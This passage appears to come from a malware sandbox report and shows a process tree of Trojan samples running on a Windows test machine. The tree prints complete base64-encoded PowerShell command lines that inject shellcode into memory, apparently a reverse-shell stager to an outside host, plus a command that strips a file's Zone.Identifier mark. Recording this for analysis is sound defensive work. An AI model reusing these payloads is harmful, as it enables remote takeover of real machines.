eQBzACIAKQA7ACQAbABpAGQAIAA9ACAAJABsAGkAZAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAbABlAGoAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJAB2AHYAVABPACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAdgBUAE8AJwApAHsAJABDAGUAPQAgACQAbABpAGQAfQA7ACQAWgB3AD0AIgAgACQAQwBlACAAeAB4AG0AIAAkAEoAUAAiADsAJABaAHcAPQAkAFoAdwAuAHIAZQBwAGwAYQBjAGUAKAAiAHgAeABtACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAWgB3AA'+'==')"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:8116
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABRAEQAPQAnACQAUgBPAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUgBUAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADEALAB9AGEAMQAsAH0AYwAxACwAfQA2ADMALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADkAZAAsAH0AMwBhACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABjACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0ANgA4ACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBlAGUALAB9AGMAMwAiADsAJABiAFkAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIATwAgAC0ATgBhAG0AZQAgACIAcABhACIAIAAtAG4AYQBtAGUAcwAgAHkAVgBCADsAJABiAFkAPQAkAGIAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVgBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgAiACsAIgBzACIAKwAiACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFIAVAAgAD0AIAAkAFIAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAbABZAFQAUwB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGwAWQBUAFMAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAHIAYgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFIAVAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHIAYgA9ACQAUgBUAC4ATAB9ADsAJAB0AHQAPQAkAGIAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAUABEAHcAIAA9ACAAMAA7AGYAbwByACgAJAB0AEkAPQAwADsAJAB0AEkAIAAtAGwAZQAoACQAUgBUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHQASQArACsAKQB7ACQAYgBZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdAB0AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHQASQApACwAIAAkAFIAVABbACQAdABJAF0ALAAgADEAKQB9ADsAJABiAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdAB0ACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAUABEAHcAKQA7ACQAZQBzAHkAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAYgBZADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABlAHMAeQAsACQAdAB0ACwAMAAsADAALAAxAC0AMQApADsAJwA7ACQASgBQAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABRAEQAKQApADsAJABDAGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAWgBKAD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGwAaQBkACAAPQAgACIAQwA6AFwAJABaAEoAXABrAHYAcwBCAEkAbABlAGoAXAAkAFoASgAkAEMAZQBcAHYAMQAuADAAXAAkAEMAZQAiADsAJABsAGkAZAAgAD0AIAAkAGwAaQBkAC4AcgBlAHAAbABhAGMAZQAoACIAawB2AHMAQgAiACwAIAAiAHMAeQBzACIAKQA7ACQAbABpAGQAIAA9ACAAJABsAGkAZAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAbABlAGoAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJAB2AHYAVABPACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAdgBUAE8AJwApAHsAJABDAGUAPQAgACQAbABpAGQAfQA7ACQAWgB3AD0AIgAgACQAQwBlACAAeAB4AG0AIAAkAEoAUAAiADsAJABaAHcAPQAkAFoAdwAuAHIAZQBwAGwAYQBjAGUAKAAiAHgAeABtACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAWgB3AA==
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:7992
                                                                                                                                                                  • C:\Windows\SysWOW64\Windowspowershell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABSAE8APQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFIAVAA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQAzADEALAB9AGQAMgAsAH0AOAA5ACwAfQBlADUALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGYAZgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA1ADgALAB9ADIAMAAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0ANAA4ACwAfQAxADgALAB9ADUAMAAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAA2ACwAfQAzADEALAB9AGYAZgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AYwAxACwAfQBhADEALAB9AGMAMQAsAH0ANgAzACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA5AGQALAB9ADMAYQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADYALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AZQBlACwAfQBjADMAIgA7ACQAYgBZAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABSAE8AIAAtAE4AYQBtAGUAIAAiAHAAYQAiACAALQBuAGEAbQBlAHMAIAB5AFYAQgA7ACQAYgBZAD0AJABiAFkALgByAGUAcABsAGEAYwBlACgAIgB5AFYAQgAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AIgArACIAcwAiACsAIgAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABSAFQAIAA9ACAAJABSAFQALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAGwAWQBUAFMAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBsAFkAVABTACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJAByAGIAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABSAFQALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJAByAGIAPQAkAFIAVAAuAEwAfQA7ACQAdAB0AD0AJABiAFkAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAFAARAB3ACAAPQAgADAAOwBmAG8AcgAoACQAdABJAD0AMAA7ACQAdABJACAALQBsAGUAKAAkAFIAVAAuAEwAZQBuAGcAdABoAC0AMQApADsAJAB0AEkAKwArACkAewAkAGIAWQA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHQAdAAuAFQAbwBJAG4AdAAzADIAKAApACsAJAB0AEkAKQAsACAAJABSAFQAWwAkAHQASQBdACwAIAAxACkAfQA7ACQAYgBZADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAHQAdAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAFAARAB3ACkAOwAkAGUAcwB5AD0AWwBpAG4AdABdADAAeAAwADAAOwAkAGIAWQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAZQBzAHkALAAkAHQAdAAsADAALAAwACwAMQAtADEAKQA7AA==
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:8188
                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\brvisxzj\brvisxzj.cmdline"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:7700
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD354.tmp" "c:\Users\Admin\AppData\Local\Temp\brvisxzj\CSC8FC1FDB3708744C8B582BF3EEC2A94FA.TMP"
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:6776
                                                                                                                                                              • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe
                                                                                                                                                                HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6460
                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe
                                                                                                                                                                    "C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:9192
                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe
                                                                                                                                                                      "C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-6d52f253766c4c64e2fb9e5f30a37eaa8833a9d9b669a627d367e9a80518f76e.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3616
                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-7482c58085cf932cf6fe89eb86224a59f3648b7aef2ca5fe6124dea9f75b8273.exe
                                                                                                                                                                      HEUR-Trojan.MSIL.Crypt.gen-7482c58085cf932cf6fe89eb86224a59f3648b7aef2ca5fe6124dea9f75b8273.exe
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:7284
                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:8808
                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-8325fd805649d3037ccf0fb384876c211a5a8f78fd43275815aaa4211c0673e8.exe
                                                                                                                                                                          HEUR-Trojan.MSIL.Crypt.gen-8325fd805649d3037ccf0fb384876c211a5a8f78fd43275815aaa4211c0673e8.exe
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:7208
                                                                                                                                                                          • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-8dffbd1a8ce1ac2c85f5f30161426b23046330b71802f9baef1f845cfdd49917.exe
                                                                                                                                                                            HEUR-Trojan.MSIL.Crypt.gen-8dffbd1a8ce1ac2c85f5f30161426b23046330b71802f9baef1f845cfdd49917.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6516
                                                                                                                                                                            • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-91a77d234b80a91a0d54ff887bf9db9b8383445aa448f18ac29bfc97a9e25c83.exe
                                                                                                                                                                              HEUR-Trojan.MSIL.Crypt.gen-91a77d234b80a91a0d54ff887bf9db9b8383445aa448f18ac29bfc97a9e25c83.exe
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:7340
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan.MSIL.Crypt.gen-91a77d234b80a91a0d54ff887bf9db9b8383445aa448f18ac29bfc97a9e25c83.exe:Zone.Identifier"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:6168
                                                                                                                                                                                • C:\Users\Admin\Desktop\00450\HEUR-Trojan.MSIL.Crypt.gen-ce41f43578c33bce32bf3eb0bc143abdfbbc21c1feed174765cceece5072b58c.exe
                                                                                                                                                                                  HEUR-Trojan.MSIL.Crypt.gen-ce41f43578c33bce32bf3eb0bc143abdfbbc21c1feed174765cceece5072b58c.exe
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:7436
